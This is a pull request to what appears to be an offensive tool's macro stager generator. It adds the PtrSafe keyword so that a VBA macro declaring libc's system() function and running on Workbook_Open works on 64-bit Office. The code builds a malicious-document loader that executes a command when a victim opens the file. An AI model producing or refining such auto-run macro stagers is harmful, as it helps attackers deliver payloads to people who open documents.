### PR TITLE
Macro loader compatibility between 64bit and x86

### DIFF
--- a/lib/stagers/macro.py
+++ b/lib/stagers/macro.py
@@ -85,7 +85,7 @@ class Stager:
                 payload = formStr("cmd", match)
 
             macro = """
-Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
+Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
 
 Private Sub Workbook_Open()
     Dim result As Long


### PR DESCRIPTION
https://msdn.microsoft.com/en-us/library/office/ee691831(v=office.14).aspx

 PtrSafe attribute enables you to use a declare statement on either 32-bit or 64-bit systems this solved a macro issue on a 64bit system